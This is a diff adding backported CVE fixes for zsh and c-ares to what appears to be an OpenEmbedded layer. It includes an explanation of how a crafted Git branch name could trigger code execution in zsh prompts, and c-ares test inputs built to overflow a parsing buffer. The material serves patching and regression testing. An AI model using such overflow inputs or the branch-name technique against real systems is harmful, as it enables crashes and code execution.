[PATCH] security/89: Partially work around CVE-2021-45444 in VCS_Info ++MIME-Version: 1.0 ++Content-Type: text/plain; charset=UTF-8 ++Content-Transfer-Encoding: 8bit ++ ++This patch is a partial, VCS_Info-specific work-around for CVE-2021-45444, ++which is mitigated in the shell itself in 5.8.1 and later versions. It is ++offered for users who are concerned about an exploit but are unable to update ++their binaries to receive the complete fix. ++ ++The patch works around the vulnerability by pre-escaping values substituted ++into format strings in VCS_Info. Please note that this may break some user ++configurations that rely on those values being un-escaped (which is why it was ++not included directly in 5.8.1). It may be possible to limit this breakage by ++adjusting exactly which ones are pre-escaped, but of course this may leave ++them vulnerable again. ++ ++If applying the patch to the file system is inconvenient or not possible, the ++following script can be used to idempotently patch the relevant function ++running in memory (and thus must be re-run when the shell is restarted): ++ ++ ++# Impacted versions go from v5.0.3 to v5.8 (v5.8.1 is the first patched version) ++autoload -Uz is-at-least ++if is-at-least 5.8.1 || ! is-at-least 5.0.3; then ++ return ++fi ++ ++# Quote necessary $hook_com[<field>] items just before they are used ++# in the line "VCS_INFO_hook 'post-backend'" of the VCS_INFO_formats ++# function, where <field> is: ++# ++# base: the full path of the repository's root directory. ++# base-name: the name of the repository's root directory. ++# branch: the name of the currently checked out branch. ++# revision: an identifier of the currently checked out revision. ++# subdir: the path of the current directory relative to the ++# repository's root directory. ++# misc: a string that may contain anything the vcs_info backend wants. ++# ++# This patch %-quotes these fields previous to their use in vcs_info hooks and ++# the zformat call and, eventually, when they get expanded in the prompt. ++# It's important to quote these here, and not later after hooks have modified the ++# fields, because then we could be quoting % characters from valid prompt sequences, ++# like %F{color}, %B, etc. ++# ++# 32 │ hook_com[subdir]="$(VCS_INFO_reposub ${hook_com[base]})" ++# 33 │ hook_com[subdir_orig]="${hook_com[subdir]}" ++# 34 │ ++# 35 + │ for tmp in base base-name branch misc revision subdir; do ++# 36 + │ hook_com[$tmp]="${hook_com[$tmp]//\%/%%}" ++# 37 + │ done ++# 38 + │ ++# 39 │ VCS_INFO_hook 'post-backend' ++# ++# This is especially important so that no command substitution is performed ++# due to malicious input as a consequence of CVE-2021-45444, which affects ++# zsh versions from 5.0.3 to 5.8. ++# ++autoload -Uz +X regexp-replace VCS_INFO_formats ++ ++# We use $tmp here because it's already a local variable in VCS_INFO_formats ++typeset PATCH='for tmp (base base-name branch misc revision subdir) hook_com[$tmp]="${hook_com[$tmp]//\%/%%}"' ++# Unique string to avoid reapplying the patch if this code gets called twice ++typeset PATCH_ID=vcs_info-patch-9b9840f2-91e5-4471-af84-9e9a0dc68c1b ++# Only patch the VCS_INFO_formats function if not already patched ++if [[ "$functions[VCS_INFO_formats]" != *$PATCH_ID* ]]; then ++ regexp-replace 'functions[VCS_INFO_formats]' \ ++ "VCS_INFO_hook 'post-backend'" \ ++ ': ${PATCH_ID}; ${PATCH}; ${MATCH}' ++fi ++unset PATCH PATCH_ID ++ ++ ++--- ++ Functions/VCS_Info/VCS_INFO_formats | 4 ++++ ++ 1 file changed, 4 insertions(+) ++ ++diff --git a/Functions/VCS_Info/VCS_INFO_formats b/Functions/VCS_Info/VCS_INFO_formats ++index e0e1dc738..4d88e28b6 100644 ++--- a/Functions/VCS_Info/VCS_INFO_formats +++++ b/Functions/VCS_Info/VCS_INFO_formats ++@@ -32,6 +32,10 @@ hook_com[base-name_orig]="${hook_com[base_name]}" ++ hook_com[subdir]="$(VCS_INFO_reposub ${hook_com[base]})" ++ hook_com[subdir_orig]="${hook_com[subdir]}" ++ +++for tmp in base base-name branch misc revision subdir; do +++ hook_com[$tmp]="${hook_com[$tmp]//\%/%%}" +++done +++ ++ VCS_INFO_hook 'post-backend' ++ ++ ## description (for backend authors): ++-- ++2.34.1 +-- +2.34.1 diff --git a/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_3.patch b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_3.patch new file mode 100644 index 0000000000..adfc00ae57 --- /dev/null +++ b/meta-oe/recipes-shells/zsh/zsh/CVE-2021-45444_3.patch @@ -0,0 +1,77 @@ +From 4abf2fc193fc2f3e680deecbf81289a7b02e245b Mon Sep 17 00:00:00 2001 +From: dana <dana@dana.is> +Date: Tue, 21 Dec 2021 13:13:33 -0600 +Subject: [PATCH 3/9] CVE-2021-45444: Update NEWS/README + +https://salsa.debian.org/debian/zsh/-/blob/debian/5.8-6+deb11u1/debian/patches/cherry-pick-CVE-2021-45444_3.patch +Upstream-Status: Backport +CVE: CVE-2021-45444 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> +--- + ChangeLog | 2 ++ + NEWS | 20 ++++++++++++++++++++ + README | 6 ++++++ + 3 files changed, 28 insertions(+) + +diff --git a/ChangeLog b/ChangeLog +index 9a05a09e1..93b0bc337 100644 +--- a/ChangeLog ++++ b/ChangeLog +@@ -1,5 +1,7 @@ + 2022-01-27 dana <dana@dana.is> + ++ * CVE-2021-45444: NEWS, README: Document preceding two changes ++ + * Marc Cornellà: security/89: + Etc/CVE-2021-45444-VCS_Info-workaround.patch: Add patch which + can optionally be used to work around recursive PROMPT_SUBST +diff --git a/NEWS b/NEWS +index 964e1633f..d34b3f79e 100644 +--- a/NEWS ++++ b/NEWS +@@ -4,6 +4,26 @@ CHANGES FROM PREVIOUS VERSIONS OF ZSH + + Note also the list of incompatibilities in the README file. + ++Changes since 5.8 ++----------------- ++ ++CVE-2021-45444: Some prompt expansion sequences, such as %F, support ++'arguments' which are themselves expanded in case they contain colour ++values, etc. This additional expansion would trigger PROMPT_SUBST ++evaluation, if enabled. This could be abused to execute code the user ++didn't expect. e.g., given a certain prompt configuration, an attacker ++could trick a user into executing arbitrary code by having them check ++out a Git branch with a specially crafted name. ++ ++This is fixed in the shell itself by no longer performing PROMPT_SUBST ++evaluation on these prompt-expansion arguments. ++ ++Users who are concerned about an exploit but unable to update their ++binaries may apply the partial work-around described in the file ++'Etc/CVE-2021-45444 VCS_Info workaround.patch' included with the shell ++source. [ Reported by RyotaK <security@ryotak.me>. Additional thanks to ++Marc Cornellà <hello@mcornella.com>. ] ++ + Changes since 5.7.1-test-3 + -------------------------- + +diff --git a/README b/README +index 7f1dd5f92..c9e994ab3 100644 +--- a/README ++++ b/README +@@ -31,6 +31,12 @@ Zsh is a shell with lots of features. For a list of some of these, see the + file FEATURES, and for the latest changes see NEWS. For more + details, see the documentation. + ++Incompatibilities since 5.8 ++--------------------------- ++ ++PROMPT_SUBST expansion is no longer performed on arguments to prompt- ++expansion sequences such as %F. ++ + Incompatibilities since 5.7.1 + ----------------------------- + +-- +2.34.1 diff --git a/meta-oe/recipes-shells/zsh/zsh_5.8.bb b/meta-oe/recipes-shells/zsh/zsh_5.8.bb index 0429cb9cc7..7602ff9f64 100644 --- a/meta-oe/recipes-shells/zsh/zsh_5.8.bb +++ b/meta-oe/recipes-shells/zsh/zsh_5.8.bb @@ -10,7 +10,11 @@ LIC_FILES_CHKSUM = "file://LICENCE;md5=1a4c4cda3e8096d2fd483ff2f4514fec" DEPENDS = "ncurses bison-native libcap libpcre gdbm groff-native" -SRC_URI = "${SOURCEFORGE_MIRROR}/project/${BPN}/${BPN}/5.8/${BP}.tar.xz" +SRC_URI = "${SOURCEFORGE_MIRROR}/project/${BPN}/${BPN}/5.8/${BP}.tar.xz \ + file://CVE-2021-45444_1.patch \ + file://CVE-2021-45444_2.patch \ + file://CVE-2021-45444_3.patch \ + " SRC_URI[sha256sum] = "dcc4b54cc5565670a65581760261c163d720991f0d06486da61f8d839b52de27" inherit autotools-brokensep gettext update-alternatives manpages @@ -18,8 +22,8 @@ inherit autotools-brokensep gettext update-alternatives manpages EXTRA_OECONF = " \ --bindir=${base_bindir} \ --enable-etcdir=${sysconfdir} \ - --enable-fndir=${datadir}/${PN}/${PV}/functions \ - --enable-site-fndir=${datadir}/${PN}/site-functions \ + --enable-fndir=${datadir}/${BPN}/${PV}/functions \ + --enable-site-fndir=${datadir}/${BPN}/site-functions \ --with-term-lib='ncursesw ncurses' \ --with-tcsetpgrp \ --enable-cap \ diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2022-4904.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2022-4904.patch new file mode 100644 index 0000000000..328075ca64 --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2022-4904.patch @@ -0,0 +1,66 @@ +From 9903253c347f9e0bffd285ae3829aef251cc852d Mon Sep 17 00:00:00 2001 +From: hopper-vul <118949689+hopper-vul@users.noreply.github.com> +Date: Wed, 18 Jan 2023 22:14:26 +0800 +Subject: [PATCH] Add str len check in config_sortlist to avoid stack overflow + (#497) + +In ares_set_sortlist, it calls config_sortlist(..., sortstr) to parse +the input str and initialize a sortlist configuration. + +However, ares_set_sortlist has not any checks about the validity of the input str. +It is very easy to create an arbitrary length stack overflow with the unchecked +`memcpy(ipbuf, str, q-str);` and `memcpy(ipbufpfx, str, q-str);` +statements in the config_sortlist call, which could potentially cause severe +security impact in practical programs. + +This commit add necessary check for `ipbuf` and `ipbufpfx` which avoid the +potential stack overflows. + +fixes #496 + +Fix By: @hopper-vul + +CVE: CVE-2022-4904 +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/9903253c347f9e0bffd285ae3829aef251cc852d] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> +--- + src/lib/ares_init.c | 4 ++++ + test/ares-test-init.cc | 2 ++ + 2 files changed, 6 insertions(+) + +diff --git a/src/lib/ares_init.c b/src/lib/ares_init.c +index 51668a5c..3f9cec65 100644 +--- a/src/lib/ares_init.c ++++ b/src/lib/ares_init.c +@@ -1913,6 +1913,8 @@ static int config_sortlist(struct apattern **sortlist, int *nsort, + q = str; + while (*q && *q != '/' && *q != ';' && !ISSPACE(*q)) + q++; ++ if (q-str >= 16) ++ return ARES_EBADSTR; + memcpy(ipbuf, str, q-str); + ipbuf[q-str] = '\0'; + /* Find the prefix */ +@@ -1921,6 +1923,8 @@ static int config_sortlist(struct apattern **sortlist, int *nsort, + const char *str2 = q+1; + while (*q && *q != ';' && !ISSPACE(*q)) + q++; ++ if (q-str >= 32) ++ return ARES_EBADSTR; + memcpy(ipbufpfx, str, q-str); + ipbufpfx[q-str] = '\0'; + str = str2; +diff --git a/test/ares-test-init.cc b/test/ares-test-init.cc +index 63c6a228..ee845181 100644 +--- a/test/ares-test-init.cc ++++ b/test/ares-test-init.cc +@@ -275,6 +275,8 @@ TEST_F(DefaultChannelTest, SetAddresses) { + + TEST_F(DefaultChannelTest, SetSortlistFailures) { + EXPECT_EQ(ARES_ENODATA, ares_set_sortlist(nullptr, "1.2.3.4")); ++ EXPECT_EQ(ARES_EBADSTR, ares_set_sortlist(channel_, "111.111.111.111*/16")); ++ EXPECT_EQ(ARES_EBADSTR, ares_set_sortlist(channel_, "111.111.111.111/255.255.255.240*")); + EXPECT_EQ(ARES_SUCCESS, ares_set_sortlist(channel_, "xyzzy ; lwk")); + EXPECT_EQ(ARES_SUCCESS, ares_set_sortlist(channel_, "xyzzy ; 0x123")); + } diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31130.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31130.patch new file mode 100644 index 0000000000..3e507f7cda --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31130.patch @@ -0,0 +1,328 @@ +From f22cc01039b6473b736d3bf438f56a2654cdf2b2 Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 22 May 2023 06:51:34 -0400 +Subject: [PATCH] Merge pull request from GHSA-x6mf-cxr9-8q6v + +* Merged latest OpenBSD changes for inet_net_pton_ipv6() into c-ares. +* Always use our own IP conversion functions now, do not delegate to OS + so we can have consistency in testing and fuzzing. +* Removed bogus test cases that never should have passed. +* Add new test case for crash bug found. + +Fix By: Brad House (@bradh352) + +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/f22cc01039b6473b736d3bf438f56a2654cdf2b2.patch] +CVE: CVE-2023-31130 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + src/lib/inet_net_pton.c | 155 ++++++++++++++++++++----------------- + test/ares-test-internal.cc | 7 +- + 2 files changed, 86 insertions(+), 76 deletions(-) + +diff --git a/src/lib/inet_net_pton.c b/src/lib/inet_net_pton.c +index 840de50..fc50425 100644 +--- a/src/lib/inet_net_pton.c ++++ b/src/lib/inet_net_pton.c +@@ -1,19 +1,20 @@ + + /* +- * Copyright (c) 2004 by Internet Systems Consortium, Inc. ("ISC") ++ * Copyright (c) 2012 by Gilles Chehade <gilles@openbsd.org> + * Copyright (c) 1996,1999 by Internet Software Consortium. + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * +- * THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES +- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR +- * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +- * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT +- * OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. ++ * THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS ++ * ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES ++ * OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE ++ * CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL ++ * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR ++ * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ++ * ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS ++ * SOFTWARE. + */ + + #include "ares_setup.h" +@@ -35,9 +36,6 @@ + + const struct ares_in6_addr ares_in6addr_any = { { { 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 } } }; + +- +-#ifndef HAVE_INET_NET_PTON +- + /* + * static int + * inet_net_pton_ipv4(src, dst, size) +@@ -60,7 +58,7 @@ const struct ares_in6_addr ares_in6addr_any = { { { 0,0,0,0,0,0,0,0,0,0,0,0,0,0, + * Paul Vixie (ISC), June 1996 + */ + static int +-inet_net_pton_ipv4(const char *src, unsigned char *dst, size_t size) ++ares_inet_net_pton_ipv4(const char *src, unsigned char *dst, size_t size) + { + static const char xdigits[] = "0123456789abcdef"; + static const char digits[] = "0123456789"; +@@ -261,19 +259,14 @@ getv4(const char *src, unsigned char *dst, int *bitsp) + } + + static int +-inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) ++ares_inet_pton6(const char *src, unsigned char *dst) + { + static const char xdigits_l[] = "0123456789abcdef", +- xdigits_u[] = "0123456789ABCDEF"; ++ xdigits_u[] = "0123456789ABCDEF"; + unsigned char tmp[NS_IN6ADDRSZ], *tp, *endp, *colonp; + const char *xdigits, *curtok; +- int ch, saw_xdigit; ++ int ch, saw_xdigit, count_xdigit; + unsigned int val; +- int digits; +- int bits; +- size_t bytes; +- int words; +- int ipv4; + + memset((tp = tmp), '\0', NS_IN6ADDRSZ); + endp = tp + NS_IN6ADDRSZ; +@@ -283,22 +276,22 @@ inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) + if (*++src != ':') + goto enoent; + curtok = src; +- saw_xdigit = 0; ++ saw_xdigit = count_xdigit = 0; + val = 0; +- digits = 0; +- bits = -1; +- ipv4 = 0; + while ((ch = *src++) != '\0') { + const char *pch; + + if ((pch = strchr((xdigits = xdigits_l), ch)) == NULL) + pch = strchr((xdigits = xdigits_u), ch); + if (pch != NULL) { ++ if (count_xdigit >= 4) ++ goto enoent; + val <<= 4; +- val |= aresx_sztoui(pch - xdigits); +- if (++digits > 4) ++ val |= (pch - xdigits); ++ if (val > 0xffff) + goto enoent; + saw_xdigit = 1; ++ count_xdigit++; + continue; + } + if (ch == ':') { +@@ -308,78 +301,107 @@ inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) + goto enoent; + colonp = tp; + continue; +- } else if (*src == '\0') ++ } else if (*src == '\0') { + goto enoent; ++ } + if (tp + NS_INT16SZ > endp) +- return (0); +- *tp++ = (unsigned char)((val >> 8) & 0xff); +- *tp++ = (unsigned char)(val & 0xff); ++ goto enoent; ++ *tp++ = (unsigned char) (val >> 8) & 0xff; ++ *tp++ = (unsigned char) val & 0xff; + saw_xdigit = 0; +- digits = 0; ++ count_xdigit = 0; + val = 0; + continue; + } + if (ch == '.' && ((tp + NS_INADDRSZ) <= endp) && +- getv4(curtok, tp, &bits) > 0) { +- tp += NS_INADDRSZ; ++ ares_inet_net_pton_ipv4(curtok, tp, INADDRSZ) > 0) { ++ tp += INADDRSZ; + saw_xdigit = 0; +- ipv4 = 1; ++ count_xdigit = 0; + break; /* '\0' was seen by inet_pton4(). */ + } +- if (ch == '/' && getbits(src, &bits) > 0) +- break; + goto enoent; + } + if (saw_xdigit) { + if (tp + NS_INT16SZ > endp) + goto enoent; +- *tp++ = (unsigned char)((val >> 8) & 0xff); +- *tp++ = (unsigned char)(val & 0xff); ++ *tp++ = (unsigned char) (val >> 8) & 0xff; ++ *tp++ = (unsigned char) val & 0xff; + } +- if (bits == -1) +- bits = 128; +- +- words = (bits + 15) / 16; +- if (words < 2) +- words = 2; +- if (ipv4) +- words = 8; +- endp = tmp + 2 * words; +- + if (colonp != NULL) { + /* + * Since some memmove()'s erroneously fail to handle + * overlapping regions, we'll do the shift by hand. + */ +- const ares_ssize_t n = tp - colonp; +- ares_ssize_t i; ++ const int n = tp - colonp; ++ int i; + + if (tp == endp) + goto enoent; + for (i = 1; i <= n; i++) { +- *(endp - i) = *(colonp + n - i); +- *(colonp + n - i) = 0; ++ endp[- i] = colonp[n - i]; ++ colonp[n - i] = 0; + } + tp = endp; + } + if (tp != endp) + goto enoent; + +- bytes = (bits + 7) / 8; +- if (bytes > size) +- goto emsgsize; +- memcpy(dst, tmp, bytes); +- return (bits); ++ memcpy(dst, tmp, NS_IN6ADDRSZ); ++ return (1); + +- enoent: ++enoent: + SET_ERRNO(ENOENT); + return (-1); + +- emsgsize: ++emsgsize: + SET_ERRNO(EMSGSIZE); + return (-1); + } + ++static int ++ares_inet_net_pton_ipv6(const char *src, unsigned char *dst, size_t size) ++{ ++ struct ares_in6_addr in6; ++ int ret; ++ int bits; ++ size_t bytes; ++ char buf[INET6_ADDRSTRLEN + sizeof("/128")]; ++ char *sep; ++ const char *errstr; ++ ++ if (strlen(src) >= sizeof buf) { ++ SET_ERRNO(EMSGSIZE); ++ return (-1); ++ } ++ strncpy(buf, src, sizeof buf); ++ ++ sep = strchr(buf, '/'); ++ if (sep != NULL) ++ *sep++ = '\0'; ++ ++ ret = ares_inet_pton6(buf, (unsigned char *)&in6); ++ if (ret != 1) ++ return (-1); ++ ++ if (sep == NULL) ++ bits = 128; ++ else { ++ if (!getbits(sep, &bits)) { ++ SET_ERRNO(ENOENT); ++ return (-1); ++ } ++ } ++ ++ bytes = (bits + 7) / 8; ++ if (bytes > size) { ++ SET_ERRNO(EMSGSIZE); ++ return (-1); ++ } ++ memcpy(dst, &in6, bytes); ++ return (bits); ++} ++ + /* + * int + * inet_net_pton(af, src, dst, size) +@@ -403,18 +425,15 @@ ares_inet_net_pton(int af, const char *src, void *dst, size_t size) + { + switch (af) { + case AF_INET: +- return (inet_net_pton_ipv4(src, dst, size)); ++ return (ares_inet_net_pton_ipv4(src, dst, size)); + case AF_INET6: +- return (inet_net_pton_ipv6(src, dst, size)); ++ return (ares_inet_net_pton_ipv6(src, dst, size)); + default: + SET_ERRNO(EAFNOSUPPORT); + return (-1); + } + } + +-#endif /* HAVE_INET_NET_PTON */ +- +-#ifndef HAVE_INET_PTON + int ares_inet_pton(int af, const char *src, void *dst) + { + int result; +@@ -434,11 +453,3 @@ int ares_inet_pton(int af, const char *src, void *dst) + return 0; + return (result > -1 ? 1 : -1); + } +-#else /* HAVE_INET_PTON */ +-int ares_inet_pton(int af, const char *src, void *dst) +-{ +- /* just relay this to the underlying function */ +- return inet_pton(af, src, dst); +-} +- +-#endif +diff --git a/test/ares-test-internal.cc b/test/ares-test-internal.cc +index 96d4ede..161f0a5 100644 +--- a/test/ares-test-internal.cc ++++ b/test/ares-test-internal.cc +@@ -81,6 +81,7 @@ TEST_F(LibraryTest, InetPtoN) { + EXPECT_EQ(0, ares_inet_net_pton(AF_INET6, "12:34::ff/0", &a6, sizeof(a6))); + EXPECT_EQ(16 * 8, ares_inet_net_pton(AF_INET6, "12:34::ffff:0.2", &a6, sizeof(a6))); + EXPECT_EQ(16 * 8, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234", &a6, sizeof(a6))); ++ EXPECT_EQ(2, ares_inet_net_pton(AF_INET6, "0::00:00:00/2", &a6, sizeof(a6))); + + // Various malformed versions + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET, "", &a4, sizeof(a4))); +@@ -118,11 +119,9 @@ TEST_F(LibraryTest, InetPtoN) { + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, ":1234:1234:1234:1234:1234:1234:1234:1234", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, ":1234:1234:1234:1234:1234:1234:1234:1234:", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678", &a6, sizeof(a6))); +- // TODO(drysdale): check whether the next two tests should give -1. +- EXPECT_EQ(0, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678", &a6, sizeof(a6))); +- EXPECT_EQ(0, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678:5678", &a6, sizeof(a6))); ++ EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678", &a6, sizeof(a6))); ++ EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "1234:1234:1234:1234:1234:1234:1234:1234:5678:5678:5678", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:257.2.3.4", &a6, sizeof(a6))); +- EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:002.2.3.4", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:1.2.3.4.5.6", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:1.2.3.4.5", &a6, sizeof(a6))); + EXPECT_EQ(-1, ares_inet_net_pton(AF_INET6, "12:34::ffff:1.2.3.z", &a6, sizeof(a6))); +-- +2.25.1 + diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31147.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31147.patch new file mode 100644 index 0000000000..bbd6aa0aec --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-31147.patch @@ -0,0 +1,717 @@ +From c543406f44fa070ea101d4d4b173c2c88af0c2a5 Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 22 May 2023 06:51:06 -0400 +Subject: [PATCH] Merge pull request from GHSA-8r8p-23f3-64c2 + +* segment random number generation into own file + +* abstract random code to make it more modular so we can have multiple backends + +* rand: add support for arc4random_buf() and also direct CARES_RANDOM_FILE reading + +* autotools: fix detection of arc4random_buf + +* rework initial rc4 seed for PRNG as last fallback + +* rc4: more proper implementation, simplified for clarity + +* clarifications + +CVE: CVE-2023-31147 +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/823df3b989e59465d17b0a2eb1239a5fc048b4e5] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> +--- + CMakeLists.txt | 2 + + configure.ac | 1 + + m4/cares-functions.m4 | 85 +++++++++++ + src/lib/Makefile.inc | 1 + + src/lib/ares_config.h.cmake | 3 + + src/lib/ares_destroy.c | 3 + + src/lib/ares_init.c | 82 ++--------- + src/lib/ares_private.h | 19 ++- + src/lib/ares_query.c | 36 +---- + src/lib/ares_rand.c | 274 ++++++++++++++++++++++++++++++++++++ + 10 files changed, 387 insertions(+), 119 deletions(-) + create mode 100644 src/lib/ares_rand.c + +diff --git a/CMakeLists.txt b/CMakeLists.txt +index 194485a..1fb9af5 100644 +--- a/CMakeLists.txt ++++ b/CMakeLists.txt +@@ -386,6 +386,8 @@ CHECK_SYMBOL_EXISTS (strncasecmp "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_STRNCAS + CHECK_SYMBOL_EXISTS (strncmpi "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_STRNCMPI) + CHECK_SYMBOL_EXISTS (strnicmp "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_STRNICMP) + CHECK_SYMBOL_EXISTS (writev "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_WRITEV) ++CHECK_SYMBOL_EXISTS (arc4random_buf "${CMAKE_EXTRA_INCLUDE_FILES}" HAVE_ARC4RANDOM_BUF) ++ + + # On Android, the system headers may define __system_property_get(), but excluded + # from libc. We need to perform a link test instead of a header/symbol test. +diff --git a/configure.ac b/configure.ac +index 1d0fb5c..9a76369 100644 +--- a/configure.ac ++++ b/configure.ac +@@ -683,6 +683,7 @@ CARES_CHECK_FUNC_STRNCASECMP + CARES_CHECK_FUNC_STRNCMPI + CARES_CHECK_FUNC_STRNICMP + CARES_CHECK_FUNC_WRITEV ++CARES_CHECK_FUNC_ARC4RANDOM_BUF + + + dnl check for AF_INET6 +diff --git a/m4/cares-functions.m4 b/m4/cares-functions.m4 +index 0f3992c..d4f4f99 100644 +--- a/m4/cares-functions.m4 ++++ b/m4/cares-functions.m4 +@@ -3753,3 +3753,88 @@ AC_DEFUN([CARES_CHECK_FUNC_WRITEV], [ + ac_cv_func_writev="no" + fi + ]) ++ ++dnl CARES_CHECK_FUNC_ARC4RANDOM_BUF ++dnl ------------------------------------------------- ++dnl Verify if arc4random_buf is available, prototyped, and ++dnl can be compiled. If all of these are true, and ++dnl usage has not been previously disallowed with ++dnl shell variable cares_disallow_arc4random_buf, then ++dnl HAVE_ARC4RANDOM_BUF will be defined. ++ ++AC_DEFUN([CARES_CHECK_FUNC_ARC4RANDOM_BUF], [ ++ AC_REQUIRE([CARES_INCLUDES_STDLIB])dnl ++ # ++ tst_links_arc4random_buf="unknown" ++ tst_proto_arc4random_buf="unknown" ++ tst_compi_arc4random_buf="unknown" ++ tst_allow_arc4random_buf="unknown" ++ # ++ AC_MSG_CHECKING([if arc4random_buf can be linked]) ++ AC_LINK_IFELSE([ ++ AC_LANG_FUNC_LINK_TRY([arc4random_buf]) ++ ],[ ++ AC_MSG_RESULT([yes]) ++ tst_links_arc4random_buf="yes" ++ ],[ ++ AC_MSG_RESULT([no]) ++ tst_links_arc4random_buf="no" ++ ]) ++ # ++ if test "$tst_links_arc4random_buf" = "yes"; then ++ AC_MSG_CHECKING([if arc4random_buf is prototyped]) ++ AC_EGREP_CPP([arc4random_buf],[ ++ $cares_includes_stdlib ++ ],[ ++ AC_MSG_RESULT([yes]) ++ tst_proto_arc4random_buf="yes" ++ ],[ ++ AC_MSG_RESULT([no]) ++ tst_proto_arc4random_buf="no" ++ ]) ++ fi ++ # ++ if test "$tst_proto_arc4random_buf" = "yes"; then ++ AC_MSG_CHECKING([if arc4random_buf is compilable]) ++ AC_COMPILE_IFELSE([ ++ AC_LANG_PROGRAM([[ ++ $cares_includes_stdlib ++ ]],[[ ++ arc4random_buf(NULL, 0); ++ return 1; ++ ]]) ++ ],[ ++ AC_MSG_RESULT([yes]) ++ tst_compi_arc4random_buf="yes" ++ ],[ ++ AC_MSG_RESULT([no]) ++ tst_compi_arc4random_buf="no" ++ ]) ++ fi ++ # ++ if test "$tst_compi_arc4random_buf" = "yes"; then ++ AC_MSG_CHECKING([if arc4random_buf usage allowed]) ++ if test "x$cares_disallow_arc4random_buf" != "xyes"; then ++ AC_MSG_RESULT([yes]) ++ tst_allow_arc4random_buf="yes" ++ else ++ AC_MSG_RESULT([no]) ++ tst_allow_arc4random_buf="no" ++ fi ++ fi ++ # ++ AC_MSG_CHECKING([if arc4random_buf might be used]) ++ if test "$tst_links_arc4random_buf" = "yes" && ++ test "$tst_proto_arc4random_buf" = "yes" && ++ test "$tst_compi_arc4random_buf" = "yes" && ++ test "$tst_allow_arc4random_buf" = "yes"; then ++ AC_MSG_RESULT([yes]) ++ AC_DEFINE_UNQUOTED(HAVE_ARC4RANDOM_BUF, 1, ++ [Define to 1 if you have the arc4random_buf function.]) ++ ac_cv_func_arc4random_buf="yes" ++ else ++ AC_MSG_RESULT([no]) ++ ac_cv_func_arc4random_buf="no" ++ fi ++]) ++ +diff --git a/src/lib/Makefile.inc b/src/lib/Makefile.inc +index a3b060c..72a7673 100644 +--- a/src/lib/Makefile.inc ++++ b/src/lib/Makefile.inc +@@ -45,6 +45,7 @@ CSOURCES = ares__addrinfo2hostent.c \ + ares_platform.c \ + ares_process.c \ + ares_query.c \ ++ ares_rand.c \ + ares_search.c \ + ares_send.c \ + ares_strcasecmp.c \ +diff --git 